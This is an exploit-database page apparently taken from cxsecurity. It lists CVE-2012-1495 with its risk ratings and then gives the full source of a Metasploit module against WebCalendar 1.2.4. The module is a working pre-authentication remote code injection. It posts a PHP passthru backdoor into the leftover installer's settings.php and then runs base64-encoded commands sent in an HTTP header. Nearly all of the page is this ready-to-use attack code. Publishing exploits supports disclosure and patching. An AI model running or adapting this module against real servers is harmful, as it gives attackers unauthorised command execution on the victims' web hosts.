WebCalendar 1.2.4 Remote Code Injection (Metasploit)

2012-04-30 / 2012-05-01
Credit: sinn3r
Risk: High
Local: No
Remote: Yes
CVE: CVE-2012-1495
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "WebCalendar 1.2.4 Pre-Auth Remote Code Injection", 'Description' => %q{ This modules exploits a vulnerability found in k5n.us WebCalendar, version 1.2.4 or less. If not removed, the settings.php script meant for installation can be update by an attacker, and then inject code in it. This allows arbitrary code execution as www-data. }, 'License' => MSF_LICENSE, 'Author' => [ 'EgiX', #Initial discovery & PoC 'sinn3r' #Metasploit ], 'References' => [ ['CVE', '2012-1495'], ['OSVDB', '81329'], ['EDB', '18775'] ], 'Arch' => ARCH_CMD, 'Platform' => ['unix', 'linux'], 'Compat' => { 'PayloadType' => 'cmd' }, 'Targets' => [ ['WebCalendar 1.2.4 on Linux', {}], ], 'Privileged' => false, 'DisclosureDate' => "Apr 23 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI path to webcalendar', '/WebCalendar-1.2.4/']) ], self.class) end def check uri = target_uri.path uri << '/' if uri[-1, 1] != '/' res = send_request_raw({ 'method' => 'GET', 'uri' => "#{uri}/login.php" }) if res and res.body =~ /WebCalendar v1.2.\d/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def exploit peer = "#{rhost}:#{rport}" uri = target_uri.path uri << '/' if uri[-1, 1] != '/' print_status("#{peer} - Housing php payload...") # Allow commands to be passed as a header. # We use 'data' instead of 'vars_post to avoid the MSF API escapeing our stuff. post_data = "app_settings=1" post_data << "&form_user_inc=user.php" post_data << "&form_single_user_login=*/print(____);passthru(base64_decode($_SERVER[HTTP_CMD]));die;" post_data << "\n"*2 send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}install/index.php", 'data' => post_data }) print_status("#{peer} - Loading our payload...") # Execute our payload send_request_raw({ 'method' => 'GET', 'uri' => "#{uri}includes/settings.php", 'headers' => { 'Cmd' => Rex::Text.encode_base64(payload.encoded) } }) handler end end

References:

http://metasploit.com/framework/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top